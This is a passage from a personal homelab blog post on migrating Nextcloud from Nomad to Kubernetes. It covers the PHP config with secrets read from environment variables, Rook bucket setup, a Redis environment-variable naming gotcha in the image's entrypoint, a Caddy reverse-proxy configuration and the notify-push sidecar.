</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;overwrite.cli.url&#39; =&gt; &#39;https://nc.example.com&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;overwriteprotocol&#39; =&gt; &#39;https&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;overwritewebroot&#39; =&gt; &#39;/&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;maintenance_window_start&#39; =&gt; 100,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;default_phone_region&#39; =&gt; &#39;DE&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbtype&#39; =&gt; &#39;pgsql&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;version&#39; =&gt; &#39;30.0.6.2&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbname&#39; =&gt; getenv(&#39;HL_DB_NAME&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbhost&#39; =&gt; getenv(&#39;HL_DB_HOST&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbport&#39; =&gt; getenv(&#39;HL_DB_PORT&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbuser&#39; =&gt; getenv(&#39;HL_DB_USER&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbpassword&#39; =&gt; getenv(&#39;HL_DB_PW&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbtableprefix&#39; =&gt; &#39;oc_&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;installed&#39; =&gt; true,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;maintenance&#39; =&gt; false,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;loglevel&#39; =&gt; 2,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;logfile&#39; =&gt; &#39;/dev/stdout&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;log_type&#39; =&gt; &#39;file&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_domain&#39; =&gt; &#39;example.com&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_from_address&#39; =&gt; &#39;nextcloud&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtpmode&#39; =&gt; &#39;smtp&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtphost&#39; =&gt; &#39;mail.example.com&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtpport&#39; =&gt; &#39;465&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtpsecure&#39; =&gt; &#39;ssl&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtpauth&#39; =&gt; true,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtpname&#39; =&gt; &#39;nc@example.com&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtppassword&#39; =&gt; getenv(&#39;HL_MAIL_PW&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;passwordsalt&#39; =&gt; getenv(&#39;HL_PW_SALT&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;secret&#39; =&gt; getenv(&#39;HL_SECRET&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    );</span>
</span></span></code></pre></div><p>One noteworthy piece here is the <code>trusted_domains</code> setting, which contains
not only the actual domain Nextcloud is hosted on, but also <code>127.0.0.1</code>. This is
necessary because of the cron setup I will describe later.
I find this kind of configuration setup, with a config file plus environment
variables for the secrets, quite convenient. It lets me have an actual config file,
but still keeps the secrets out of it without having to work with some sort of
templating.</p>
<p>Another advantage of this setup, where I get to choose the environment variable
names the config reads, is that I can use autogenerated Secrets directly, as you can see in the S3
setup:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#e6db74">&#39;objectstore&#39;</span> <span style="color:#f92672">=&gt;</span> [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#39;class&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#e6db74">&#39;\\OC\\Files\\ObjectStore\\S3&#39;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#39;arguments&#39;</span> <span style="color:#f92672">=&gt;</span> [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;bucket&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#a6e22e">getenv</span>(<span style="color:#e6db74">&#39;BUCKET_NAME&#39;</span>),
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;autocreate&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#66d9ef">true</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;key&#39;</span>    <span style="color:#f92672">=&gt;</span> <span style="color:#a6e22e">getenv</span>(<span style="color:#e6db74">&#39;AWS_ACCESS_KEY_ID&#39;</span>),
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;secret&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#a6e22e">getenv</span>(<span style="color:#e6db74">&#39;AWS_SECRET_ACCESS_KEY&#39;</span>),
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;hostname&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#a6e22e">getenv</span>(<span style="color:#e6db74">&#39;BUCKET_HOST&#39;</span>),
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;port&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#a6e22e">getenv</span>(<span style="color:#e6db74">&#39;BUCKET_PORT&#39;</span>),
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;use_ssl&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#66d9ef">false</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;use_path_style&#39;</span><span style="color:#f92672">=&gt;</span><span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>],
</span></span></code></pre></div><p>Here I was able to define the env variables in such a way that I could just
use the ConfigMap and Secret generated by Rook via <code>envFrom</code> in the Deployment,
instead of having to define every variable individually.</p>
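<p>For completeness: the <code>nextcloud-bucket</code> ConfigMap and Secret come out of Rook&rsquo;s
bucket provisioning, the usual way to get such a pair being an ObjectBucketClaim. A minimal
sketch of such a claim might look like this (bucket name and storage class are placeholders);
Rook then creates a ConfigMap and Secret named after the claim, containing
<code>BUCKET_NAME</code>, <code>BUCKET_HOST</code>, <code>BUCKET_PORT</code>,
<code>AWS_ACCESS_KEY_ID</code> and <code>AWS_SECRET_ACCESS_KEY</code>:</p>
<pre tabindex="0"><code>apiVersion: objectbucket.io/v1alpha1
kind: ObjectBucketClaim
metadata:
  name: nextcloud-bucket
spec:
  generateBucketName: nextcloud
  storageClassName: rook-ceph-bucket   # assumption: whatever bucket StorageClass the cluster provides
</code></pre>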
<p>But as I&rsquo;ve noted above, Nextcloud needs write access to the config file, so
just mounting the ConfigMap into the container is not an option, because ConfigMaps
are always mounted read-only.
So I had to reach for the typical init container trick used in these situations
and copy the config map into the webapp volume:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>      <span style="color:#f92672">initContainers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-init</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">alpine:3.21.2</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;cp&#34;</span>, <span style="color:#e6db74">&#34;/config/config.php&#34;</span>, <span style="color:#e6db74">&#34;/data/config/config.php&#34;</span>]
</span></span></code></pre></div><p>Next comes the Nextcloud container itself. The main thing I&rsquo;d like to point out
here is a gotcha that had me scratching my head for a little while. You can
see that I set two env variables for Redis, <code>HL_REDIS_HOST</code> and <code>HL_REDIS_PORT</code>.
When I first launched the Pod, those were called <code>REDIS_HOST</code> and <code>REDIS_PORT</code>,
which just so happen to be the same environment variables that the image uses.
It resulted in this error message:</p>
<pre tabindex="0"><code>Configuring Redis as session handler
/entrypoint.sh: 111: cannot create /usr/local/etc/php/conf.d/redis-session.ini: Permission denied
</code></pre><p>It made me pretty suspicious, because the ownership of the <code>/usr</code> hierarchy
cannot have changed between Nomad and k8s, and the container was running with
the same UID/GID as it was in the Nomad cluster. So why was I suddenly seeing
this permission issue? I rummaged a bit through the <a href="https://github.com/nextcloud/docker/blob/master/docker-entrypoint.sh">Docker entrypoint</a>
of the image and found that the error message was coming from this piece of
code:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>REDIS_HOST+x<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        echo <span style="color:#e6db74">&#34;Configuring Redis as session handler&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            file_env REDIS_HOST_PASSWORD
</span></span><span style="display:flex;"><span>            echo <span style="color:#e6db74">&#39;session.save_handler = redis&#39;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># check if redis host is an unix socket path</span>
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">$(</span>echo <span style="color:#e6db74">&#34;</span>$REDIS_HOST<span style="color:#e6db74">&#34;</span> | cut -c1-1<span style="color:#66d9ef">)</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>REDIS_HOST_PASSWORD+x<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                echo <span style="color:#e6db74">&#34;session.save_path = \&#34;unix://</span><span style="color:#e6db74">${</span>REDIS_HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">?auth=</span><span style="color:#e6db74">${</span>REDIS_HOST_PASSWORD<span style="color:#e6db74">}</span><span style="color:#e6db74">\&#34;&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>                echo <span style="color:#e6db74">&#34;session.save_path = \&#34;unix://</span><span style="color:#e6db74">${</span>REDIS_HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">\&#34;&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># check if redis password has been set</span>
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">elif</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>REDIS_HOST_PASSWORD+x<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                echo <span style="color:#e6db74">&#34;session.save_path = \&#34;tcp://</span><span style="color:#e6db74">${</span>REDIS_HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">:</span><span style="color:#e6db74">${</span>REDIS_HOST_PORT:=6379<span style="color:#e6db74">}</span><span style="color:#e6db74">?auth=</span><span style="color:#e6db74">${</span>REDIS_HOST_PASSWORD<span style="color:#e6db74">}</span><span style="color:#e6db74">\&#34;&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>                echo <span style="color:#e6db74">&#34;session.save_path = \&#34;tcp://</span><span style="color:#e6db74">${</span>REDIS_HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">:</span><span style="color:#e6db74">${</span>REDIS_HOST_PORT:=6379<span style="color:#e6db74">}</span><span style="color:#e6db74">\&#34;&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>            echo <span style="color:#e6db74">&#34;redis.session.locking_enabled = 1&#34;</span>
</span></span><span style="display:flex;"><span>            echo <span style="color:#e6db74">&#34;redis.session.lock_retries = -1&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># redis.session.lock_wait_time is specified in microseconds.</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># Wait 10ms before retrying the lock rather than the default 2ms.</span>
</span></span><span style="display:flex;"><span>            echo <span style="color:#e6db74">&#34;redis.session.lock_wait_time = 10000&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span> &gt; /usr/local/etc/php/conf.d/redis-session.ini
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">fi</span>
</span></span></code></pre></div><p>That block sets up the Redis session handler configuration, and I ran into it
inadvertently because I had named my env variables the same as the image&rsquo;s.
The error went away when I renamed the env variables to have the <code>HL_</code> prefix,
so the entrypoint didn&rsquo;t hit the <code>if</code> above anymore.</p>
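<p>The gotcha is the <code>${REDIS_HOST+x}</code> parameter expansion: it expands to <code>x</code>
whenever the variable is set at all, even to an empty string, so merely defining
<code>REDIS_HOST</code> is enough to send the entrypoint down that branch. A quick way to see
it in a shell:</p>
<pre tabindex="0"><code>$ unset REDIS_HOST;  [ -n "${REDIS_HOST+x}" ] &amp;&amp; echo set || echo unset
unset
$ REDIS_HOST="";     [ -n "${REDIS_HOST+x}" ] &amp;&amp; echo set || echo unset
set
</code></pre>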
<p>Also worth noting: the Nextcloud container doesn&rsquo;t expose any port. Only the
Caddy web server does, and it proxies all requests targeting PHP files to the
Nextcloud container.</p>
<p>That Caddy container looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-web</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">caddy:{{ .Values.caddyVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/my-apps/nextcloud</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webscratch</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/caddy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">400m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.caddy }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.caddy }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span></code></pre></div><p>It doesn&rsquo;t need any of the Secrets and environment variables that the Nextcloud
container needs, and gets its configuration from a <code>Caddyfile</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">Caddyfile</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      admin off
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      auto_https off
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      log {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        output stdout
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        level INFO
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      servers {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        trusted_proxies static 127.0.0.1/32 300.300.300.1/32
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    :{{ .Values.ports.caddy }} {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      root * /my-apps/nextcloud
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      file_server
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      log {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        output stdout
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        format filter {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          wrap json
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          fields {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            request&gt;headers&gt;Authorization delete
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            request&gt;headers&gt;Cookie delete
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      route /push/* {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          uri strip_prefix /push
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          reverse_proxy http://localhost:{{ .Values.ports.notifyPush }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      @provider-matcher {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        path_regexp ^\/(?:updater|oc[ms]-provider)(?:$|\/)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      rewrite @provider-matcher {path}/index.php
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      @php-matcher {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        path_regexp ^\/(?:index|remote|public|cron|core\/ajax\/update|status|ocs\/v[12]|updater\/.+|oc[ms]-provider\/.+)\.php(?:$|\/)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      php_fastcgi @php-matcher localhost:9000 {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        root /var/www/html
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      redir /.well-known/carddav /remote.php/dav/ 301
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      redir /.well-known/caldav /remote.php/dav/ 301
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      redir /.well-known/webfinger /index.php{uri} 301
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      redir /.well-known/nodeinfo /index.php{uri} 301
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      @forbidden {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /.htaccess
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /.user.ini
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /3rdparty/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /authors
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /build/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /config/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /console*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /copying
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /data/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /db_structure
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /lib/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /occ
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /README
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /templates/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /tests/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /console.php
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      respond @forbidden 404
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }</span>
</span></span></code></pre></div><p>This config does a couple of things. First, it defines the webapp volume as the
HTTP root and thus serves the content directly. This is so Caddy serves
Nextcloud&rsquo;s static assets. An important piece is the log config, which removes
some secret data like cookies and auth headers from the request log.
Then there are a number of routes: the first proxies requests for the
notify-push backend to that container&rsquo;s port. Next comes a rewrite of some
&ldquo;special&rdquo; paths to PHP, followed by the general PHP matcher, which forwards all PHP file
requests to the Nextcloud container. And finally, a couple of explicitly
forbidden paths covering files that shouldn&rsquo;t be reachable from outside.</p>
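<p>Once everything is reachable, a quick way to check that the <code>.well-known</code>
redirects behave is to look at the <code>Location</code> header Caddy sends back (domain
substituted as usual):</p>
<pre tabindex="0"><code>$ curl -sI https://nc.example.com/.well-known/caldav | grep -i location
# expected: a Location header pointing at /remote.php/dav/
</code></pre>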
<p>Then there&rsquo;s the nextcloud-push container:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-push</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nextcloud:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;/usr/bin/bash&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-c&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;chmod u+x /var/www/html/custom_apps/notify_push/bin/$(uname -m)/notify_push; /var/www/html/custom_apps/notify_push/bin/$(uname -m)/notify_push&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/www/html</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">NEXTCLOUD_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;https://cloud.mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">REDIS_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;redis://redis.redis.svc.cluster.local:6379&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">PORT</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;{{ .Values.ports.notifyPush }}&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">DATABASE_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">uri</span>
</span></span></code></pre></div><p>The notify-push component, which is separate from Nextcloud&rsquo;s main codebase,
is their attempt to solve some performance issues. Normally, clients have to
proactively poll the server for changed files. This becomes inefficient fast,
even in a small deployment like mine with at most three connected clients. In
contrast to the majority of Nextcloud, this component was written in Rust for
performance reasons. I&rsquo;ve just checked and did not see much change in the CPU
usage of my Nomad Nextcloud deployment after deploying notify-push for the first
time, but I still figure: why not.</p>
<p>There were a couple of problems with this deployment, though. The very first
one was the fact that the Rust binaries are located in per-arch directories.
In Nomad that wasn&rsquo;t a problem; I could define the command&rsquo;s path like this:</p>
<pre tabindex="0"><code>/var/www/html/custom_apps/notify_push/bin/${attr.kernel.arch}/notify_push
</code></pre><p>Nomad would replace <code>${attr.kernel.arch}</code> with the CPU architecture of the
node the job got scheduled on.
I was 100% sure that Kubernetes would have something similar. In fact, I knew
it did: the information is stored in the <code>kubernetes.io/arch</code> label. You can
get labels into env variables with the <a href="https://kubernetes.io/docs/concepts/workloads/pods/downward-api/">Downward API</a>,
